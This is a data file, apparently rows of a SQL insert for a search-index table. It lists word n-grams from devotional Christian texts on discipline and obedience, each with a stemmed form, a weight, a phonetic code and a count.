(253477, 'or perfects moral', 'or perfects moral', 0, 1, 1.5667, 'O6161232564', 2, '*'),
(253478, 'order into', 'order into', 0, 1, 1.3333, 'O63653', 2, '*'),
(253479, 'order into your', 'order into your', 0, 1, 1.5, 'O636536', 2, '*'),
(253480, 'order to discipline', 'order to discipline', 0, 1, 1.6333, 'O63632145', 2, '*'),
(253481, 'other hand', 'other hand', 0, 1, 1.3333, 'O3653', 2, '*'),
(253482, 'other hand makes', 'other hand makes', 0, 1, 1.5333, 'O365352', 2, '*'),
(253483, 'otherwise you', 'otherwis you', 0, 1, 1.4333, 'O362', 2, '*'),
(253484, 'otherwise you might', 'otherwis you might', 0, 1, 1.6333, 'O362523', 2, '*'),
(253485, 'over again', 'over again', 0, 1, 1.3333, 'O1625', 2, '*'),
(253486, 'over again they', 'over again they', 0, 1, 1.5, 'O16253', 2, '*'),
(253487, 'over and over', 'over and over', 0, 1, 1.4333, 'O165316', 3, '*'),
(253488, 'overnight', 'overnight', 0, 0, 0.6, 'O16523', 2, '*'),
(253489, 'overnight discipline', 'overnight discipline', 0, 1, 1.6667, 'O165232145', 2, '*'),
(253490, 'overnight discipline also', 'overnight discipline also', 0, 1, 1.8333, 'O16523214542', 2, '*'),
(253491, 'own carelessness', 'own carelessness', 0, 1, 1.5333, 'O5264252', 2, '*'),
(253492, 'own carelessness indiscipline', 'own carelessness indiscipline', 0, 1, 1.9667, 'O5264252532145', 2, '*'),
(253493, 'panic', 'panic', 0, 0, 0.3333, 'P520', 2, '*'),
(253494, 'panic attacks', 'panic attacks', 0, 1, 1.4333, 'P5232', 2, '*'),
(253495, 'panic attacks while', 'panic attacks while', 0, 1, 1.6333, 'P52324', 2, '*'),
(253496, 'part of what', 'part of what', 0, 1, 1.4, 'P6313', 2, '*'),
(253497, 'pastor had', 'pastor had', 0, 1, 1.3333, 'P2363', 2, '*'),
(253498, 'pastor had to', 'pastor had to', 0, 1, 1.4333, 'P2363', 2, '*'),
(253499, 'people on', 'peopl on', 0, 1, 1.3, 'P450', 2, '*'),
(253500, 'people on earth', 'peopl on earth', 0, 1, 1.5, 'P4563', 2, '*'),
(253501, 'people who are', 'peopl who are', 0, 1, 1.4667, 'P460', 2, '*'),
(253502, 'perfects', 'perfect', 0, 0, 0.5333, 'P61232', 2, '*'),
(253503, 'perfects moral', 'perfect moral', 0, 1, 1.4667, 'P61232564', 2, '*'),
(253504, 'perfects moral character', 'perfect moral character', 0, 1, 1.8, 'P6123256426236', 2, '*'),
(253505, 'piece', 'piec', 0, 0, 0.3333, 'P200', 2, '*'),
(253508, 'place of divine', 'place of divine', 0, 1, 1.5, 'P421315', 2, '*'),
(253509, 'porous', 'porou', 0, 0, 0.4, 'P620', 2, '*'),
(253510, 'porous and', 'porou and', 0, 1, 1.3333, 'P6253', 2, '*'),
(253511, 'porous and open', 'porou and open', 0, 1, 1.5, 'P625315', 2, '*'),
(253512, 'pray for over', 'prai for over', 0, 1, 1.4333, 'P61616', 2, '*'),
(253513, 'programmes', 'programm', 0, 0, 0.6667, 'P62652', 2, '*'),
(253514, 'programmes in', 'programm in', 0, 1, 1.4333, 'P626525', 2, '*'),
(253515, 'programmes in order', 'programm in order', 0, 1, 1.6333, 'P626525636', 2, '*'),
(253516, 'ready for life\'s', 'readi for life', 0, 1, 1.5333, 'R316412', 2, '*'),
(253517, 'receive training', 'receiv training', 0, 1, 1.5333, 'R213652', 2, '*'),
(253518, 'receive training that', 'receiv training that', 0, 1, 1.7, 'R2136523', 2, '*'),
(253519, 'reduce a', 'reduc a', 0, 1, 1.2667, 'R320', 2, '*'),
(253520, 'reduce a man', 'reduc a man', 0, 1, 1.4, 'R325', 2, '*'),
(253521, 'remain there without', 'remain there without', 0, 1, 1.6667, 'R5363', 2, '*'),
(253522, 'reproach', 'reproach', 0, 0, 0.5333, 'R162', 2, '*'),
(253523, 'reproach accepting', 'reproach accepting', 0, 1, 1.6, 'R1621352', 2, '*'),
(253525, 'resources time', 'resourc time', 0, 1, 1.4667, 'R26235', 2, '*'),
(253526, 'resources time and', 'resourc time and', 0, 1, 1.6, 'R262353', 2, '*'),
(253527, 'respect and honour', 'respect and honour', 0, 1, 1.6, 'R21235356', 2, '*'),
(253528, 'respected indiscipline', 'respect indiscipline', 0, 1, 1.7333, 'R2123532145', 2, '*'),
(253529, 'respected indiscipline leads', 'respect indiscipline leads', 0, 1, 1.9333, 'R2123532145432', 2, '*'),
(253530, 'respected people', 'respect people', 0, 1, 1.5333, 'R212314', 2, '*'),
(253531, 'respected people on', 'respect people on', 0, 1, 1.6333, 'R2123145', 2, '*'),
(253532, 'respond with', 'respond with', 0, 1, 1.4, 'R2153', 2, '*'),
(253533, 'respond with the', 'respond with the', 0, 1, 1.5333, 'R2153', 2, '*'),
(253534, 'rest that\'s', 'rest that', 0, 1, 1.3667, 'R232', 2, '*'),
(253535, 'rest that\'s why', 'rest that why', 0, 1, 1.5, 'R232', 2, '*'),
(253536, 'richer', 'richer', 0, 0, 0.4, 'R260', 2, '*'),
(253537, 'richer and', 'richer and', 0, 1, 1.3333, 'R2653', 2, '*'),
(253538, 'richer and makes', 'richer and makes', 0, 1, 1.5333, 'R265352', 2, '*'),
(253539, 'right heart', 'right heart', 0, 1, 1.3667, 'R2363', 2, '*'),
(253540, 'right heart make', 'right heart make', 0, 1, 1.5333, 'R236352', 2, '*'),
(253542, 'set of values', 'set of values', 0, 1, 1.4333, 'S3142', 2, '*'),
(253543, 'several programmes', 'sever programmes', 0, 1, 1.6, 'S164162652', 2, '*'),
(253544, 'several programmes in', 'sever programmes in', 0, 1, 1.7, 'S1641626525', 2, '*'),
(253545, 'shame', 'shame', 0, 0, 0.3333, 'S500', 2, '*'),
(253546, 'shame and', 'shame and', 0, 1, 1.3, 'S530', 2, '*'),
(253547, 'shame and reproach', 'shame and reproach', 0, 1, 1.6, 'S536162', 2, '*'),
(253548, 'somewhere to', 'somewher to', 0, 1, 1.4, 'S563', 2, '*'),
(253549, 'somewhere to happen', 'somewher to happen', 0, 1, 1.6333, 'S56315', 2, '*'),
(253550, 'soul especially', 'soul especially', 0, 1, 1.5, 'S42124', 2, '*'),
(253551, 'soul especially if', 'soul especially if', 0, 1, 1.6, 'S421241', 2, '*'),
(253552, 'stronger makes', 'stronger makes', 0, 1, 1.4667, 'S3652652', 2, '*'),
(253553, 'stronger makes you', 'stronger makes you', 0, 1, 1.6, 'S3652652', 2, '*'),
(253554, 'structure in church', 'structur in church', 0, 1, 1.6333, 'S362365262', 2, '*'),
(253555, 'such a man', 'such a man', 0, 1, 1.3333, 'S500', 2, '*'),
(253556, 'such that it', 'such that it', 0, 1, 1.4, 'S300', 2, '*'),
(253557, 'suffer panic', 'suffer panic', 0, 1, 1.4, 'S16152', 2, '*'),
(253558, 'suffer panic attacks', 'suffer panic attacks', 0, 1, 1.6667, 'S1615232', 2, '*'),
(253559, 'supplied to', 'suppli to', 0, 1, 1.3667, 'S143', 2, '*'),
(253560, 'supplied to you', 'suppli to you', 0, 1, 1.5, 'S143', 2, '*'),
(253561, 'take discipline', 'take discipline', 0, 1, 1.5, 'T232145', 2, '*'),
(253562, 'take discipline it', 'take discipline it', 0, 1, 1.6, 'T2321453', 2, '*'),
(253563, 'that comes your', 'that comes your', 0, 1, 1.5, 'T2526', 2, '*'),
(253564, 'that corrects', 'that corrects', 0, 1, 1.4333, 'T26232', 2, '*'),
(253565, 'that corrects you', 'that corrects you', 0, 1, 1.5667, 'T26232', 2, '*'),
(253566, 'that he had', 'that he had', 0, 1, 1.3667, 'T000', 2, '*'),
(253567, 'that it controls', 'that it controls', 0, 1, 1.5333, 'T253642', 2, '*'),
(253568, 'that pastor', 'that pastor', 0, 1, 1.3667, 'T1236', 2, '*'),
(253569, 'that pastor had', 'that pastor had', 0, 1, 1.5, 'T12363', 2, '*'),
(253570, 'that works', 'that works', 0, 1, 1.3333, 'T620', 2, '*'),
(253571, 'that works kingdom', 'that works kingdom', 0, 1, 1.6, 'T625235', 2, '*'),
(253572, 'that\'s why in', 'that why in', 0, 1, 1.4333, 'T250', 2, '*'),
(253573, 'the birthright', 'the birthright', 0, 1, 1.4667, 'T163623', 2, '*'),
(253574, 'the birthright but', 'the birthright but', 0, 1, 1.6, 'T16362313', 2, '*'),
(253575, 'the children and', 'the children and', 0, 1, 1.5333, 'T243653', 2, '*'),
(253576, 'the easiest thing', 'the easiest thing', 0, 1, 1.5667, 'T2352', 2, '*'),
(253577, 'the fabric', 'the fabric', 0, 1, 1.3333, 'T162', 2, '*'),
(253578, 'the fabric of', 'the fabric of', 0, 1, 1.4333, 'T1621', 2, '*'),
(253579, 'the family', 'the family', 0, 1, 1.3333, 'T154', 2, '*'),
(253580, 'the family of', 'the family of', 0, 1, 1.4333, 'T1541', 2, '*'),
(253581, 'the good of', 'the good of', 0, 1, 1.3667, 'T231', 3, '*'),
(253582, 'the heir', 'the heir', 0, 1, 1.2667, 'T600', 2, '*'),
(253583, 'the heir by', 'the heir by', 0, 1, 1.3667, 'T610', 2, '*'),
(253584, 'the most divinely', 'the most divinely', 0, 1, 1.5667, 'T523154', 2, '*'),
(253585, 'the ones that', 'the ones that', 0, 1, 1.4333, 'T523', 2, '*'),
(253586, 'the ones who', 'the ones who', 0, 1, 1.4, 'T520', 2, '*'),
(253587, 'the other hand', 'the other hand', 0, 1, 1.4667, 'T653', 2, '*'),
(253588, 'the right heart', 'the right heart', 0, 1, 1.5, 'T62363', 2, '*'),
(253589, 'their own carelessness', 'their own carelessness', 0, 1, 1.7333, 'T65264252', 2, '*'),
(253590, 'there are great', 'there are great', 0, 1, 1.5, 'T6263', 2, '*'),
(253591, 'there without', 'there without', 0, 1, 1.4333, 'T630', 2, '*'),
(253592, 'there without discipline', 'there without discipline', 0, 1, 1.8, 'T632145', 2, '*'),
(253593, 'they are respected', 'thei are respected', 0, 1, 1.6, 'T62123', 2, '*'),
(253594, 'they are the', 'thei are the', 0, 1, 1.4, 'T630', 2, '*'),
(253595, 'they eventually', 'thei eventually', 0, 1, 1.5, 'T1534', 2, '*'),
(253596, 'they eventually become', 'thei eventually become', 0, 1, 1.7333, 'T1534125', 2, '*'),
(253597, 'they may', 'thei may', 0, 1, 1.2667, 'T500', 3, '*'),
(253598, 'they may not', 'thei may not', 0, 1, 1.4, 'T530', 2, '*'),
(253599, 'thing to do', 'thing to do', 0, 1, 1.3667, 'T523', 2, '*'),
(253600, 'through several', 'through several', 0, 1, 1.5, 'T62164', 2, '*'),
(253601, 'through several programmes', 'through several programmes', 0, 1, 1.8667, 'T62164162652', 2, '*'),
(253602, 'time and energy', 'time and energy', 0, 1, 1.5, 'T53562', 2, '*'),
(253603, 'to a piece', 'to a piece', 0, 1, 1.3333, 'T120', 2, '*'),
(253604, 'to all kinds', 'to all kinds', 0, 1, 1.4, 'T42532', 2, '*'),
(253605, 'to be disciplined', 'to be disciplined', 0, 1, 1.5667, 'T1321453', 2, '*'),
(253606, 'to come into', 'to come into', 0, 1, 1.4, 'T253', 2, '*'),
(253607, 'to discipline', 'to discipline', 0, 1, 1.4333, 'T2145', 2, '*'),
(253608, 'to discipline your', 'to discipline your', 0, 1, 1.6, 'T21456', 2, '*'),
(253609, 'to do but', 'to do but', 0, 1, 1.3, 'T130', 3, '*'),
(253610, 'to enter', 'to enter', 0, 1, 1.2667, 'T536', 2, '*'),
(253611, 'to enter your', 'to enter your', 0, 1, 1.4333, 'T536', 2, '*'),
(253612, 'to happen', 'to happen', 0, 1, 1.3, 'T150', 2, '*'),
(253613, 'to happen the', 'to happen the', 0, 1, 1.4333, 'T153', 2, '*'),
(253614, 'to help they', 'to help they', 0, 1, 1.4, 'T413', 2, '*'),
(253615, 'to his brother', 'to his brother', 0, 1, 1.4667, 'T21636', 2, '*'),
(253616, 'to obey', 'to obey', 0, 1, 1.2333, 'T100', 6, '*'),
(253617, 'to obey instructions', 'to obey instructions', 0, 1, 1.6667, 'T152362352', 2, '*'),
(253618, 'to receive training', 'to receive training', 0, 1, 1.6333, 'T6213652', 2, '*'),
(253619, 'to shame', 'to shame', 0, 1, 1.2667, 'T250', 2, '*'),
(253620, 'to shame and', 'to shame and', 0, 1, 1.4, 'T253', 2, '*'),
(253621, 'to take discipline', 'to take discipline', 0, 1, 1.6, 'T232145', 2, '*'),
(253622, 'to training', 'to training', 0, 1, 1.3667, 'T652', 2, '*'),
(253623, 'to training it', 'to training it', 0, 1, 1.4667, 'T6523', 2, '*'),
(253624, 'to you as', 'to you as', 0, 1, 1.3, 'T200', 2, '*'),
(253625, 'training a', 'train a', 0, 1, 1.3333, 'T652', 2, '*'),
(253626, 'training a place', 'train a place', 0, 1, 1.5333, 'T652142', 2, '*'),
(253627, 'training it', 'train it', 0, 1, 1.3667, 'T6523', 2, '*'),
(253628, 'training it means', 'train it means', 0, 1, 1.5667, 'T652352', 2, '*'),
(253629, 'training that corrects', 'train that corrects', 0, 1, 1.7333, 'T652326232', 2, '*'),
(253630, 'undisciplined', 'undisciplin', 0, 0, 0.8667, 'U5321453', 2, '*'),
(253631, 'undisciplined church', 'undisciplin church', 0, 1, 1.6667, 'U5321453262', 2, '*'),
(253632, 'undisciplined church members', 'undisciplin church members', 0, 1, 1.9333, 'U53214532625162', 2, '*'),
(253633, 'undisciplined man', 'undisciplin man', 0, 1, 1.5667, 'U53214535', 2, '*'),
(253634, 'undisciplined man has', 'undisciplin man has', 0, 1, 1.7, 'U532145352', 2, '*'),
(253635, 'undisciplined man will', 'undisciplin man will', 0, 1, 1.7333, 'U532145354', 2, '*'),
(253636, 'values and have', 'valu and have', 0, 1, 1.5, 'V42531', 2, '*'),
(253637, 'victims', 'victim', 0, 0, 0.4667, 'V2352', 2, '*'),
(253638, 'victims of', 'victim of', 0, 1, 1.3333, 'V23521', 2, '*'),
(253639, 'victims of their', 'victim of their', 0, 1, 1.5333, 'V2352136', 2, '*'),
(253640, 'was the heir', 'wa the heir', 0, 1, 1.4, 'W236', 2, '*'),
(253641, 'wastes', 'wast', 0, 0, 0.4, 'W232', 2, '*'),
(253642, 'wastes resources', 'wast resources', 0, 1, 1.5333, 'W2326262', 2, '*'),
(253643, 'wastes resources time', 'wast resources time', 0, 1, 1.7, 'W232626235', 2, '*'),
(253644, 'way like', 'wai like', 0, 1, 1.2667, 'W420', 2, '*'),
(253645, 'way like esau', 'wai like esau', 0, 1, 1.4333, 'W420', 2, '*'),
(253646, 'we take', 'we take', 0, 1, 1.2333, 'W320', 2, '*'),
(253647, 'we take you', 'we take you', 0, 1, 1.3667, 'W320', 2, '*'),
(253648, 'what conditions', 'what conditions', 0, 1, 1.5, 'W325352', 2, '*'),
(253649, 'what conditions your', 'what conditions your', 0, 1, 1.6667, 'W3253526', 2, '*'),
(253650, 'what is supplied', 'what is supplied', 0, 1, 1.5333, 'W32143', 2, '*'),
(253651, 'when you accept', 'when you accept', 0, 1, 1.5, 'W5213', 2, '*'),
(253652, 'while the', 'while the', 0, 1, 1.3, 'W430', 3, '*'),
(253653, 'while the family', 'while the family', 0, 1, 1.5333, 'W43154', 2, '*'),
(253654, 'who are difficult', 'who are difficult', 0, 1, 1.5667, 'W631243', 2, '*'),
(253655, 'who are disciplined', 'who are disciplined', 0, 1, 1.6333, 'W6321453', 2, '*'),
(253656, 'why in', 'why in', 0, 1, 1.2, 'W500', 2, '*'),
(253657, 'why in the', 'why in the', 0, 1, 1.3333, 'W530', 2, '*'),
(253658, 'will always suffer', 'will always suffer', 0, 1, 1.6, 'W4216', 2, '*'),
(253659, 'with it esau', 'with it esau', 0, 1, 1.4, 'W320', 2, '*'),
(253660, 'with the right', 'with the right', 0, 1, 1.4667, 'W3623', 2, '*'),
(253661, 'without discipline', 'without discipline', 0, 1, 1.6, 'W32145', 2, '*'),
(253662, 'without discipline your', 'without discipline your', 0, 1, 1.7667, 'W321456', 2, '*'),
(253663, 'working makes', 'work makes', 0, 1, 1.4333, 'W625252', 2, '*'),
(253664, 'working makes divine', 'work makes divine', 0, 1, 1.6667, 'W625252315', 2, '*'),
(253665, 'works kingdom', 'work kingdom', 0, 1, 1.4333, 'W625235', 2, '*'),
(253666, 'works kingdom discipline', 'work kingdom discipline', 0, 1, 1.8, 'W62523532145', 2, '*'),
(253667, 'you accept', 'you accept', 0, 1, 1.3333, 'Y213', 2, '*'),
(253668, 'you accept it', 'you accept it', 0, 1, 1.4333, 'Y213', 2, '*'),
(253669, 'you composed', 'you composed', 0, 1, 1.4, 'Y25123', 2, '*'),
(253670, 'you composed an', 'you composed an', 0, 1, 1.5, 'Y251235', 2, '*'),
(253671, 'you don\'t just', 'you don just', 0, 1, 1.4667, 'Y35323', 2, '*'),
(253672, 'you embrace', 'you embrace', 0, 1, 1.3667, 'Y5162', 2, '*'),
(253673, 'you embrace structure', 'you embrace structure', 0, 1, 1.7, 'Y516236236', 2, '*'),
(253674, 'you have accepted', 'you have accepted', 0, 1, 1.5667, 'Y1213', 2, '*'),
(253675, 'you it means', 'you it means', 0, 1, 1.4, 'Y352', 2, '*'),
(253676, 'you mature', 'you mature', 0, 1, 1.3333, 'Y536', 2, '*'),
(253677, 'you mature makes', 'you mature makes', 0, 1, 1.5333, 'Y53652', 2, '*'),
(253678, 'you might', 'you might', 0, 1, 1.3, 'Y523', 2, '*'),
(253679, 'you might have', 'you might have', 0, 1, 1.4667, 'Y5231', 2, '*'),
(253680, 'you moulds', 'you moulds', 0, 1, 1.3333, 'Y5432', 2, '*'),
(253681, 'you moulds you', 'you moulds you', 0, 1, 1.4667, 'Y5432', 2, '*'),
(253682, 'you or perfects', 'you or perfects', 0, 1, 1.5, 'Y6161232', 2, '*'),
(253683, 'you respond', 'you respond', 0, 1, 1.3667, 'Y62153', 2, '*'),
(253684, 'you respond with', 'you respond with', 0, 1, 1.5333, 'Y62153', 2, '*'),
(253685, 'you richer', 'you richer', 0, 1, 1.3333, 'Y626', 2, '*'),
(253686, 'you richer and', 'you richer and', 0, 1, 1.4667, 'Y62653', 2, '*'),
(253687, 'you stronger', 'you stronger', 0, 1, 1.4, 'Y236526', 2, '*'),
(253688, 'you stronger makes', 'you stronger makes', 0, 1, 1.6, 'Y23652652', 2, '*'),
(253689, 'you through several', 'you through several', 0, 1, 1.6333, 'Y362164', 2, '*'),
(253690, 'your body desires', 'your body desires', 0, 1, 1.5667, 'Y613262', 2, '*'),
(253691, 'your decisions', 'your decisions', 0, 1, 1.4667, 'Y63252', 2, '*'),
(253692, 'your destiny overnight', 'your destiny overnight', 0, 1, 1.7333, 'Y6323516523', 2, '*'),
(253693, 'your destiny till', 'your destiny till', 0, 1, 1.5667, 'Y6323534', 2, '*'),
(253694, 'your good', 'your good', 0, 1, 1.3, 'Y623', 2, '*'),
(253695, 'your good and', 'your good and', 0, 1, 1.4333, 'Y62353', 2, '*'),
(253696, 'your life becomes', 'your life becomes', 0, 1, 1.5667, 'Y641252', 2, '*'),
(253697, 'your life discipline', 'your life discipline', 0, 1, 1.6667, 'Y64132145', 2, '*'),
(253698, 'your life for', 'your life for', 0, 1, 1.4333, 'Y6416', 2, '*'),
(253699, 'your soul especially', 'your soul especially', 0, 1, 1.6667, 'Y6242124', 2, '*'),
(253700, 'your way', 'your way', 0, 1, 1.2667, 'Y600', 2, '*'),
(253701, 'your way like', 'your way like', 0, 1, 1.4333, 'Y642', 2, '*'),
(256048, '04 06', '04 06', 0, 1, 1.1667, '', 2, '*'),
(256049, '04 06 2017', '04 06 2017', 0, 1, 1.3333, '', 2, '*'),
(256050, '06', '06', 0, 0, 0.2, '', 5, '*'),
(256051, '06 2017', '06 2017', 0, 1, 1.2333, '', 5, '*'),
(256052, '1 14', '1 14', 0, 1, 1.1333, '', 2, '*'),
(256053, '1 14 to', '1 14 to', 0, 1, 1.2333, 'T000', 2, '*'),
(256054, '1 7', '1 7', 0, 1, 1.1, '', 2, '*'),
(256055, '1 7 peter', '1 7 peter', 0, 1, 1.3, 'P360', 2, '*'),
(256056, '14 28', '14 28', 0, 1, 1.1667, '', 2, '*'),
(256057, '14 28 29', '14 28 29', 0, 1, 1.2667, '', 2, '*'),
(256058, '14 to', '14 to', 0, 1, 1.1667, 'T000', 2, '*'),
(256059, '14 to the', '14 to the', 0, 1, 1.3, 'T000', 2, '*'),
(256060, '2 5', '2 5', 0, 1, 1.1, '', 2, '*'),
(256061, '2 5 also', '2 5 also', 0, 1, 1.2667, 'A420', 2, '*'),
(256062, '2 kin', '2 kin', 0, 1, 1.1667, 'K500', 2, '*'),
(256063, '2 kin 4', '2 kin 4', 0, 1, 1.2333, 'K500', 2, '*'),
(256064, '2 kin 5', '2 kin 5', 0, 1, 1.2333, 'K500', 2, '*'),
(256065, '28 29', '28 29', 0, 1, 1.1667, '', 2, '*'),
(256066, '28 29 beloved', '28 29 beloved', 0, 1, 1.4333, 'B413', 2, '*'),
(256067, '29 beloved', '29 beloved', 0, 1, 1.3333, 'B413', 2, '*'),
(256068, '29 beloved your', '29 beloved your', 0, 1, 1.5, 'B4136', 2, '*'),
(256069, '4 1 7', '4 1 7', 0, 1, 1.1667, '', 2, '*'),
(256070, '4 7 even', '4 7 even', 0, 1, 1.2667, 'E150', 2, '*'),
(256071, '5 1', '5 1', 0, 1, 1.1, '', 2, '*'),
(256072, '5 1 14', '5 1 14', 0, 1, 1.2, '', 2, '*'),
(256073, '5 4', '5 4', 0, 1, 1.1, '', 2, '*'),
(256074, '5 4 7', '5 4 7', 0, 1, 1.1667, '', 2, '*'),
(256075, '5 also', '5 also', 0, 1, 1.2, 'A420', 2, '*'),
(256076, '5 also remember', '5 also remember', 0, 1, 1.5, 'A426516', 2, '*'),
(256077, '50', '50', 0, 0, 0.2, '', 2, '*'),
(256078, '50 from', '50 from', 0, 1, 1.2333, 'F650', 2, '*'),
(256079, '50 from our', '50 from our', 0, 1, 1.3667, 'F656', 2, '*'),
(256080, '7 even', '7 even', 0, 1, 1.2, 'E150', 2, '*'),
(256081, '7 even peter', '7 even peter', 0, 1, 1.4, 'E15136', 2, '*'),
(256082, '7 peter', '7 peter', 0, 1, 1.2333, 'P360', 2, '*'),
(256083, '7 peter also', '7 peter also', 0, 1, 1.4, 'P3642', 2, '*'),
(256084, 'a return', 'a return', 0, 1, 1.2667, 'A6365', 2, '*'),
(256085, 'a return of', 'a return of', 0, 1, 1.3667, 'A63651', 2, '*'),
(256086, 'all night', 'all night', 0, 1, 1.3, 'A4523', 2, '*'),
(256087, 'all night and', 'all night and', 0, 1, 1.4333, 'A452353', 2, '*'),
(256088, 'all through', 'all through', 0, 1, 1.3667, 'A4362', 3, '*'),
(256089, 'all through scriptures', 'all through scriptures', 0, 1, 1.7333, 'A436261362', 2, '*'),
(256090, 'also remember', 'also remember', 0, 1, 1.4333, 'A426516', 2, '*'),
(256091, 'also remember the', 'also remember the', 0, 1, 1.5667, 'A4265163', 2, '*'),
(256092, 'also who', 'also who', 0, 1, 1.2667, 'A420', 2, '*'),
(256093, 'also who toiled', 'also who toiled', 0, 1, 1.5, 'A42343', 2, '*'),
(256094, 'am sure', 'am sure', 0, 1, 1.2333, 'A526', 2, '*'),
(256095, 'am sure he', 'am sure he', 0, 1, 1.3333, 'A526', 2, '*'),
(256096, 'an obedient', 'an obedient', 0, 1, 1.3667, 'A51353', 2, '*'),
(256097, 'an obedient life', 'an obedient life', 0, 1, 1.5333, 'A5135341', 2, '*'),
(256098, 'and caught', 'and caught', 0, 1, 1.3333, 'A5323', 2, '*'),
(256099, 'and caught nothing', 'and caught nothing', 0, 1, 1.6, 'A53235352', 2, '*'),
(256100, 'and had', 'and had', 0, 1, 1.2333, 'A530', 2, '*'),
(256101, 'and had a', 'and had a', 0, 1, 1.3, 'A530', 2, '*'),
(256102, 'and had miracles', 'and had miracles', 0, 1, 1.5333, 'A5356242', 2, '*'),
(256103, 'and not experience', 'and not experience', 0, 1, 1.6, 'A535321652', 2, '*'),
(256104, 'and see if', 'and see if', 0, 1, 1.3333, 'A5321', 2, '*'),
(256105, 'and she obeyed', 'and she obeyed', 0, 1, 1.4667, 'A53213', 2, '*'),
(256106, 'and start obeying', 'and start obeying', 0, 1, 1.5667, 'A532363152', 2, '*'),
(256107, 'and tell', 'and tell', 0, 1, 1.2667, 'A534', 2, '*'),
(256108, 'and tell him', 'and tell him', 0, 1, 1.4, 'A5345', 2, '*'),
(256109, 'and the authorities', 'and the authorities', 0, 1, 1.6333, 'A53632', 2, '*'),
(256110, 'and the supernatural', 'and the supernatural', 0, 1, 1.6667, 'A532165364', 2, '*'),
(256111, 'any area', 'ani area', 0, 1, 1.2667, 'A560', 2, '*'),
(256112, 'any area of', 'ani area of', 0, 1, 1.3667, 'A561', 2, '*'),
(256113, 'area of', 'area of', 0, 1, 1.2333, 'A610', 2, '*'),
(256114, 'area of disobedience', 'area of disobedience', 0, 1, 1.6667, 'A61321352', 2, '*'),
(256115, 'ask yourself “am', 'ask yourself “am', 0, 1, 1.5333, 'A262415', 2, '*'),
(256116, 'at cana', 'at cana', 0, 1, 1.2333, 'A325', 2, '*'),
(256117, 'at cana joh', 'at cana joh', 0, 1, 1.3667, 'A3252', 2, '*'),
(256118, 'at the marriage', 'at the marriage', 0, 1, 1.5, 'A3562', 2, '*'),
(256119, 'at the master\'s', 'at the master', 0, 1, 1.5, 'A352362', 2, '*'),
(256120, 'at the word', 'at the word', 0, 1, 1.3667, 'A363', 2, '*'),
(256121, 'authorities', 'author', 0, 0, 0.7333, 'A3632', 3, '*'),
(256122, 'authorities over', 'author over', 0, 1, 1.5333, 'A363216', 2, '*'),
(256123, 'authorities over you', 'author over you', 0, 1, 1.6667, 'A363216', 2, '*'),
(256124, 'be enslaved', 'be enslaved', 0, 1, 1.3667, 'B52413', 2, '*'),
(256125, 'be enslaved but', 'be enslaved but', 0, 1, 1.5, 'B5241313', 2, '*'),
(256126, 'be far-fetched', 'be far-fetched', 0, 1, 1.4667, 'B61323', 2, '*'),
(256127, 'be far-fetched ask', 'be far-fetched ask', 0, 1, 1.6, 'B613232', 2, '*'),
(256128, 'because you don\'t', 'becaus you don', 0, 1, 1.5667, 'B2353', 2, '*'),
(256129, 'before the master', 'befor the master', 0, 1, 1.5667, 'B635236', 2, '*'),
(256130, 'begin to take', 'begin to take', 0, 1, 1.4333, 'B2532', 2, '*'),
(256131, 'being cut', 'be cut', 0, 1, 1.3, 'B523', 2, '*'),
(256132, 'being cut off', 'be cut off', 0, 1, 1.4333, 'B5231', 2, '*'),
(256133, 'beloved your', 'belov your', 0, 1, 1.4, 'B4136', 2, '*'),
(256134, 'beloved your obedience', 'belov your obedience', 0, 1, 1.7333, 'B41361352', 2, '*'),
(256135, 'board', 'board', 0, 0, 0.3333, 'B630', 2, '*'),
(256136, 'board in', 'board in', 0, 1, 1.2667, 'B635', 2, '*'),
(256137, 'board in the', 'board in the', 0, 1, 1.4, 'B6353', 2, '*'),
(256138, 'boat', 'boat', 0, 0, 0.2667, 'B300', 2, '*'),
(256139, 'boat at', 'boat at', 0, 1, 1.2333, 'B300', 2, '*'),
(256140, 'boat at the', 'boat at the', 0, 1, 1.3667, 'B300', 2, '*'),
(256141, 'boat luk', 'boat luk', 0, 1, 1.2667, 'B342', 2, '*'),
(256142, 'boat luk 5', 'boat luk 5', 0, 1, 1.3333, 'B342', 2, '*'),
(256143, 'but at', 'but at', 0, 1, 1.2, 'B300', 3, '*'),
(256144, 'but at the', 'but at the', 0, 1, 1.3333, 'B300', 2, '*'),
(256145, 'but came', 'but came', 0, 1, 1.2667, 'B325', 2, '*'),
(256146, 'but came to', 'but came to', 0, 1, 1.3667, 'B3253', 2, '*'),
(256147, 'but obedience', 'but obedience', 0, 1, 1.4333, 'B31352', 2, '*'),
(256148, 'but obedience is', 'but obedience is', 0, 1, 1.5333, 'B31352', 2, '*'),
(256149, 'calling i', 'call i', 0, 1, 1.3, 'C452', 2, '*'),
(256150, 'calling i can', 'call i can', 0, 1, 1.4333, 'C4525', 2, '*'),
(256151, 'came on', 'came on', 0, 1, 1.2333, 'C500', 2, '*'),
(256152, 'came on the', 'came on the', 0, 1, 1.3667, 'C530', 2, '*'),
(256153, 'came to the', 'came to the', 0, 1, 1.3667, 'C530', 2, '*'),
(256154, 'can stand', 'can stand', 0, 1, 1.3, 'C52353', 3, '*'),
(256155, 'can stand before', 'can stand before', 0, 1, 1.5333, 'C5235316', 2, '*'),
(256156, 'cana', 'cana', 0, 0, 0.2667, 'C500', 2, '*'),
(256157, 'cana joh', 'cana joh', 0, 1, 1.2667, 'C520', 2, '*'),
(256158, 'cana joh 2', 'cana joh 2', 0, 1, 1.3333, 'C520', 2, '*'),
(256159, 'caught nothing', 'caught nothing', 0, 1, 1.4667, 'C35352', 2, '*'),
(256160, 'caught nothing but', 'caught nothing but', 0, 1, 1.6, 'C3535213', 2, '*'),
(256161, 'centre i', 'centr i', 0, 1, 1.2667, 'C536', 2, '*'),
(256162, 'centre i encourage', 'centr i encourage', 0, 1, 1.6, 'C5365262', 2, '*'),
(256163, 'check your', 'check your', 0, 1, 1.3333, 'C600', 3, '*'),
(256164, 'check your life', 'check your life', 0, 1, 1.5, 'C641', 3, '*'),
(256165, 'come on', 'come on', 0, 1, 1.2333, 'C500', 2, '*'),
(256166, 'come on board', 'come on board', 0, 1, 1.4333, 'C5163', 2, '*'),
(256167, 'connects', 'connect', 0, 0, 0.5333, 'C5232', 2, '*'),
(256168, 'connects you', 'connect you', 0, 1, 1.4, 'C5232', 2, '*'),
(256169, 'connects you to', 'connect you to', 0, 1, 1.5, 'C52323', 2, '*'),
(256170, 'critical may', 'critic may', 0, 1, 1.4, 'C63245', 2, '*'),
(256171, 'critical may god', 'critic may god', 0, 1, 1.5333, 'C6324523', 2, '*'),
